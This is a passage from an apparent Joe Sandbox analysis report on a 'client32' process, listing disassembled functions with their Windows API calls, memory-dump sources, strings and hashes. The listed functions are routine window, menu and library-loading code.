                                                                                                                                                                                Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,00000000,00000000), ref: 1113F116
                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 1113F1C9
                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,00000000,00000000), ref: 1113F1F4
                                                                                                                                                                                • UpdateWindow.USER32(?), ref: 1113F21B
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
                                                                                                                                                                                • String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 490496107-2775872530
                                                                                                                                                                                • Opcode ID: 9a94b1ca3c5798eb2d1bf3fcc5187c92374d34a059759de75bf3bd91d914a38c
                                                                                                                                                                                • Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
                                                                                                                                                                                • Opcode Fuzzy Hash: 9a94b1ca3c5798eb2d1bf3fcc5187c92374d34a059759de75bf3bd91d914a38c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52
                                                                                                                                                                                Function 11023470 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowTextLengthA.USER32(?), ref: 11023491
                                                                                                                                                                                • GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 110234D7
                                                                                                                                                                                • GetDlgItem.USER32(00000000,000013AB), ref: 11023521
                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 11023524
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • GetDlgItem.USER32(00000000,?), ref: 1102356B
                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 11023577
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                                                                                                                • API String ID: 3823882759-1986719024
                                                                                                                                                                                • Opcode ID: 54ae341e37a5643086782adcfd980542ac60482a501a1e2047d0cdaa111c5ee9
                                                                                                                                                                                • Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
                                                                                                                                                                                • Opcode Fuzzy Hash: 54ae341e37a5643086782adcfd980542ac60482a501a1e2047d0cdaa111c5ee9
                                                                                                                                                                                • Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51
                                                                                                                                                                                Function 11147090 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 76librarytimeloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                                                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                                                • LoadLibraryA.KERNEL32(secur32.dll,2520CF5D,?,?,?), ref: 111470D1
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserNameExA), ref: 111470E9
                                                                                                                                                                                • timeGetTime.WINMM(?,?), ref: 111470FC
                                                                                                                                                                                • timeGetTime.WINMM(?,?), ref: 11147113
                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 11147119
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 1114713B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryTimetime$AddressErrorFreeLastLoadOpenProcVersion_strncpy
                                                                                                                                                                                • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                                                                                                                                                • API String ID: 2484349941-3523682560
                                                                                                                                                                                • Opcode ID: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                                                                                                                • Instruction ID: 239420fb0a48951737c4620445babbd702d2d5c7b2e12e3c68ea42fdfe54a75f
                                                                                                                                                                                • Opcode Fuzzy Hash: 90d5310cb4319c1b2a34e0ee3ba343071ef984b38b0df5c548d3ae9b042d5487
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A219875D04629ABDB149FA5DD44FAFFFB8EB05B14F110225FC15E7A44E73059008BA1
                                                                                                                                                                                Function 1101F2A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 70windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                                                                                                                                • _free.LIBCMT ref: 1101F305
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                • _free.LIBCMT ref: 1101F30E
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast
                                                                                                                                                                                • String ID: $0$UndoOwnerDraw
                                                                                                                                                                                • API String ID: 1898979368-790594647
                                                                                                                                                                                • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                                                                                                                • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                                                                                                                • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                                                                                                                Function 110377F0 Relevance: 15.2, APIs: 10, Instructions: 228COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItemTextA.USER32(?,?,?,00000080), ref: 11037824
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 11037872
                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 110378C6
                                                                                                                                                                                • GetBkColor.GDI32(?), ref: 11037A5C
                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 110378F9
                                                                                                                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                                                                                                                  • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                                                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 11037923
                                                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
                                                                                                                                                                                • DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
                                                                                                                                                                                • DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 11037B49
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 649858571-0
                                                                                                                                                                                • Opcode ID: 18b6aa67b295ee498552df918cd891aa3dfe9d1307ff4ebc028b3570e9912dc7
                                                                                                                                                                                • Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
                                                                                                                                                                                • Opcode Fuzzy Hash: 18b6aa67b295ee498552df918cd891aa3dfe9d1307ff4ebc028b3570e9912dc7
                                                                                                                                                                                • Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51
                                                                                                                                                                                Function 11025480 Relevance: 15.2, APIs: 10, Instructions: 207windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFocus.USER32(?), ref: 110254CE
                                                                                                                                                                                • GetDlgItem.USER32(?,00001396), ref: 110254E2
                                                                                                                                                                                • CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
                                                                                                                                                                                • ShowCaret.USER32(00000000), ref: 11025515
                                                                                                                                                                                • DestroyCaret.USER32 ref: 11025529
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Caret$CreateDestroyFocusItemShow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3189774202-0
                                                                                                                                                                                • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                                                                                                                • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                                                                                                                                • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                                                                                                                                Function 110572E0 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 393registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 1105733D
                                                                                                                                                                                  • Part of subcall function 1101B7A0: LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,00000000), ref: 110577BE
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,00000000), ref: 11057851
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 11057CDA
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$InitializeLibraryLoadUninitialize__wcstoi64
                                                                                                                                                                                • String ID: Client$DisableSecurity$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                                • API String ID: 2138175088-1374498661
                                                                                                                                                                                • Opcode ID: 0d9488dd7347dd27fe3e780c63dff48d36aa9ac8cc2963b118f703253191de13
                                                                                                                                                                                • Instruction ID: 85da2a046ce415879a61a25005e9880521de040fd2741b7bd910a149e75c9bf5
                                                                                                                                                                                • Opcode Fuzzy Hash: 0d9488dd7347dd27fe3e780c63dff48d36aa9ac8cc2963b118f703253191de13
                                                                                                                                                                                • Instruction Fuzzy Hash: F702F63594016A9FCB65DB54CD94FDDB3B8BF48204F1082DAE51AA7241EB30AF89CF94
                                                                                                                                                                                Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                                                                                • _memmove.LIBCMT ref: 11035267
                                                                                                                                                                                • _memmove.LIBCMT ref: 1103528B
                                                                                                                                                                                • _memmove.LIBCMT ref: 110352C5
                                                                                                                                                                                • _memmove.LIBCMT ref: 110352E1
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1103532B
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                                                • String ID: deque<T> too long
                                                                                                                                                                                • API String ID: 827257264-309773918
                                                                                                                                                                                • Opcode ID: b0d14c5bb657fa42958264fc029b976a29fa439136e5a6680b5f4233e6f3f2f1
                                                                                                                                                                                • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                                                                                                                                • Opcode Fuzzy Hash: b0d14c5bb657fa42958264fc029b976a29fa439136e5a6680b5f4233e6f3f2f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                                                                                                                                Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                                                                                                                  • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                                                                  • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
